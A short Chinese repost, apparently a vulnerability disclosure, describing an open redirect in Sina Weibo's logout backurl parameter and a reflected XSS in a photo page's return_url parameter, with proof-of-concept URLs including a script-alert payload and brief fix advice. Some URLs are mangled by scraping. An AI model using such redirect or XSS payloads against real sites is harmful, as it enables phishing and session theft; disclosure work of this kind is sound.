新浪微博任意跳转以及一个xss - 网站安全 - 自学

1.退出那,跳转地址可以改。漏洞证明：http://weibo测试数据/logout.php?backurl=// HdhCmsTest2cto测试数据 http://weibo.cn/dpool/ttt/crossDomain.php?u=http:// HdhCmsTest2cto测试数据修复方案：无 2.xss return_url的值没有作限制. http://photo.weibo测试数据/1930831457/albums/index/view_album_id/3407197837952313?return_url="><script>alert('XSS')</script><!-- 修复方案：对return_url的值进行过滤作者QQ852451559

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did12336

更新时间：2022-09-13 阅读：39次